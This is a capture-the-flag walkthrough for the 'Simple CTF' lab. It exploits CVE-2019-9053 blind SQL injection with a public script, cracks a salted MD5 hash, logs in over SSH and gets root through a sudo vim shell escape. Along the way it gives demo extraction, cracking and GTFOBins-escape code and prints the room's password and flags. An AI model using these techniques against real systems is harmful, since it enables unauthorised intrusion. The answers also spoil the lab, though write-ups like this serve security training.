Simple CTF Walkthrough

Simple CTF is an easy machine with a straightforward path: there are no hidden or complicated steps, but it will mainly teach you how to use a public exploit from Exploit-DB to gain access to a system.

Let’s start by scanning the machine to see which ports are open:

nmap -sC -sV Machine_IP

Let’s get the results

Simple CTF nmap

Here we can see three services running on the machine:

  • FTP service port 21
  • Apache Service port 80
  • SSH service port 2222

Then we can answer the following questions:

How many services are running under port 1000?

2

What is running on the higher port?

SSH

Now let’s investigate the running services. Since there is an Apache web server, let’s start with it and open the website.

You should get the default Apache2 page. Let’s run gobuster against the site while we investigate the FTP service:

gobuster dir --url http://machine_IP --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z

While we wait for the results, let’s connect to the FTP service, since anonymous login is enabled.

You will find a “pub” directory, and inside it a file “ForMitch.txt” with the following content:

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Great, so we know the password is weak and crackable; let’s keep that in mind.

By now you should have the gobuster results (or wait until it finishes); you should get the following:

Simple CTF gobuster

Let’s access /simple, which gives us the following website:

Simple CTF Website

While we investigate the source code and figure out which CMS this is, let’s run gobuster against this path too and see whether there are any hidden pages that could help us (we won’t actually use them, but here are the results in case):

gobuster dir --url http://machine_IP/simple --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z
Simple CTF /simple gobuster

While we wait for the gobuster results, let’s identify the CMS: it is “CMS Made Simple” version 2.2.8 (you can see it in the footer of the website):

Simple CTF CMS version

Let’s check whether there are any known exploits for this CMS version with searchsploit (-w prints the Exploit-DB URL instead of the local path):

searchsploit cms made simple 2.2.8 -w

and we got one result:

Simple CTF searchsploit

Let’s open the URL and get the CVE number for the next question.

Simple CTF CVE

As you can see the CVE is “2019-9053”, but we need to add “CVE-” before the number for the answer, so it would be:

What’s the CVE you’re using against the application?

CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

SQLi

Let’s download the exploit to understand it before using it. We can see that the exploit targets the following URL (the front-end handler of the News module):

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
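To understand what the script does with that URL, here is an added example (not the exploit-db script and not part of the original walkthrough) of the character-by-character, time-based blind extraction loop this class of exploit uses: each request appends a condition that only makes the database sleep() when a guessed prefix of the target value is correct, and the client decides by timing the response. The HTTP request and the database are replaced by a constructed in-memory oracle, and SECRET, DELAY and the hex alphabet are made-up values so the code runs offline.

```python
import time

# Constructed target value standing in for something the real exploit pulls out
# of the database (the salt and password hash are hex strings, hence the hex
# alphabet below). Both this value and DELAY are made up for the demo.
SECRET = "5f4dcc3b"
DELAY = 0.01            # seconds the injected sleep() adds on a true condition
ALPHABET = "0123456789abcdef"


def oracle(prefix_hex):
    """Constructed stand-in for the HTTP round trip to
    moduleinterface.php?mact=News,m1_,default,0 with the injected condition.

    The injected SQL compares the target against 0x<prefix_hex>25 (0x25 is '%',
    so this is a LIKE 'prefix%' test) and calls sleep() only when it matches.
    Returns the measured response time, which is the only signal the client
    gets in a blind injection.
    """
    start = time.monotonic()
    if SECRET.startswith(bytes.fromhex(prefix_hex).decode()):
        time.sleep(DELAY)
    return time.monotonic() - start


def extract(oracle, length, alphabet=ALPHABET, threshold=DELAY * 0.8):
    """Recover `length` characters by extending the known prefix one character
    at a time and keeping the guess whose request ran long enough."""
    known = ""
    for _ in range(length):
        for ch in alphabet:
            guess_hex = (known + ch).encode().hex()   # same hex form the payload uses
            if oracle(guess_hex) >= threshold:
                known += ch
                break
        else:
            # No candidate slowed the response: wrong alphabet, or jitter pushed
            # a true case under the threshold. Real scripts re-request or raise
            # the sleep time rather than guessing.
            raise RuntimeError("no match at position %d" % len(known))
    return known


if __name__ == "__main__":
    recovered = extract(oracle, len(SECRET))
    print("recovered:", recovered, "ok" if recovered == SECRET else "MISMATCH")
```

Swapping `oracle` for a function that issues the real request and returns the measured round-trip time turns this into the exploit’s core loop; a wider alphabet is needed for fields like the username, and the threshold must leave room for network jitter, which is why such scripts let you tune the sleep time.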

Now, this code is written for Python 2, while Python 3 (along with pip3) is the default on most Linux distributions today, so we need to install pip for Python 2.7 in order to run the script. You could also use the 2to3 tool to convert the script to Python 3, but it might not work out of the box.

You can install pip for Python 2.7 with these commands (as described in a StackOverflow post), then run the exploit without arguments to see its usage:

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
python2.7 46635.py

You should get the script’s usage output, which shows that we need to specify the target URL along with a wordlist in order to recover the password, so let’s do that:

python2.7 46635.py -u http://10.10.6.98/simple/ --crack -w /usr/share/wordlists/rockyou.txt
Simple CTF exploit
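The --crack step does not touch the server: it takes the salt and the admin’s password hash that the injection pulled out and walks the wordlist offline. Here is an added example (not from the exploit-db script or the original post) of that offline step, assuming CMS Made Simple’s salted MD5 scheme, md5(salt + password), which is what the exploit’s crack routine compares against. The salt, the hash and the small inline wordlist are constructed for the demo; point it at rockyou.txt for a real run.

```python
import hashlib


def crack_salted_md5(salt, target_hash, wordlist):
    """Return the first candidate with md5(salt + candidate) == target_hash,
    or None if the wordlist is exhausted.

    `wordlist` is any iterable of lines, so an open rockyou.txt works as well
    as a list. Only the line terminator is stripped, since trailing spaces
    can be part of a password. Hash comparison is case-insensitive because
    tools print hex digests in either case.
    """
    target = target_hash.strip().lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        # surrogateescape round-trips the non-UTF-8 bytes rockyou contains when
        # the file is opened with errors="surrogateescape".
        data = (salt + candidate).encode("utf-8", "surrogateescape")
        if hashlib.md5(data).hexdigest() == target:
            return candidate
    return None


# Constructed sample: a made-up 16-byte salt and the hash of a weak password,
# standing in for the (salt, hash) pair the injection returns. The hash is
# computed here only because we do not have the real pair from the box.
SAMPLE_SALT = "1dac0d92e9fa6bb2"
SAMPLE_HASH = hashlib.md5((SAMPLE_SALT + "secret").encode()).hexdigest()
SAMPLE_WORDLIST = ["123456", "password", "letmein", "secret", "qwerty"]


def demo():
    """Run the crack against the constructed sample and return the password."""
    return crack_salted_md5(SAMPLE_SALT, SAMPLE_HASH, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("cracked:", demo())
    # Real run against the wordlist used above:
    # with open("/usr/share/wordlists/rockyou.txt", errors="surrogateescape") as f:
    #     print(crack_salted_md5(salt, pw_hash, f))
```

The salt is why a plain MD5 lookup table is useless here and the wordlist has to be re-hashed per target; with an unsalted, fast hash like MD5 that is still only one digest per candidate, which is why a weak password falls in seconds, exactly as the note on the FTP server says.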

What’s the password?

secret

Since the note already told us that Mitch uses the same password for his system account, we should be able to SSH into the machine with the same credentials.

Where can you login with the details obtained?

SSH

Let’s connect to the machine through SSH on port 2222 with the password “secret”:

ssh mitch@10.10.78.251 -p2222

and you should get a shell:

Simple CTF mitch shell

Now let’s print user.txt (you can find it by listing the home directory):

What’s the user flag?

G00d j0b, keep up!

To check for other users, we can either list the directories in /home or check /etc/passwd; I will list /home since it’s cleaner.

Is there any other user in the home directory? What’s its name?

sunbath

Now, to try to escalate privileges, let’s check the basics by looking at which programs we can run with sudo:

sudo -l
Simple CTF sudo

and we can see that vim can be run as root.

What can you leverage to spawn a privileged shell?

vim

Now let’s run vim through sudo and spawn a shell from it, using the command from GTFOBins:

sudo vim -c ':!/bin/sh'
Simple CTF root shell
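On a box like this the sudo -l output can be read by eye, but the triage is worth automating for the general case. Here is an added example (not part of the original walkthrough) that parses sudo -l output and flags every rule whose binary has a well-known GTFOBins-style shell escape. The vim escape is the one used in this room, the other entries are the standard sudo escapes for those tools, and the sample output it parses is constructed in the format sudo -l prints on Debian/Ubuntu hosts.

```python
import re

# Shell escapes for binaries that commonly appear in sudo -l output.
# 'vim' is the one used in this room; the rest are the standard GTFOBins sudo
# escapes. 'ALL' covers the "(ALL) ALL" rule, which needs no trick at all.
SHELL_ESCAPES = {
    "ALL":     "sudo /bin/sh",
    "vim":     "sudo vim -c ':!/bin/sh'",
    "vi":      "sudo vi -c ':!/bin/sh'",
    "less":    "sudo less /etc/profile   # then type  !/bin/sh",
    "more":    "sudo more /etc/profile   # then type  !/bin/sh",
    "find":    "sudo find . -exec /bin/sh \\; -quit",
    "awk":     "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python":  "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "env":     "sudo env /bin/sh",
    "bash":    "sudo bash",
    "sh":      "sudo sh",
}

# Constructed sample in the Debian/Ubuntu sudo -l layout (not the real output).
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl status apache2
"""

# "(runas) TAG: TAG: /path/cmd args, /path/other" -> runas, tags, command list
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Yield (runas, nopasswd, command) for each rule listed after the
    'may run the following commands' header; Defaults lines are skipped."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            yield m.group("runas").strip(), nopasswd, cmd.strip()


def find_privesc(text):
    """Return the rules that hand out a shell: the binary has a known escape
    and the rule does not pin arguments (sudo matches a rule's argument list
    exactly, so '/usr/bin/systemctl status apache2' is not abusable this way)."""
    hits = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        parts = cmd.split()
        binary = parts[0].rsplit("/", 1)[-1]
        escape = SHELL_ESCAPES.get(binary)
        if escape and len(parts) == 1:
            hits.append({"runas": runas, "nopasswd": nopasswd,
                         "command": cmd, "escape": escape})
    return hits


if __name__ == "__main__":
    for hit in find_privesc(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if hit["nopasswd"] else "password required"
        print("%s as %s (%s): %s" % (hit["command"], hit["runas"], tag, hit["escape"]))
```

Feed it the real output with `sudo -l | python3 triage.py` after replacing the sample with `sys.stdin.read()`. The argument-pinning check matters in both directions: it keeps the tool from reporting `systemctl status apache2` as a shell, and it is a reminder that the fix for a rule like the vim one is not to restrict vim’s arguments but to not grant an editor with a shell escape as root at all.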

and we have root access. Now we can go and check for the flag (usually in /root):

What’s the root flag?

W3ll d0n3. You made it!

And we’re done with this room. It was pretty simple and straightforward, but we got to use a public exploit to get a foothold on the machine.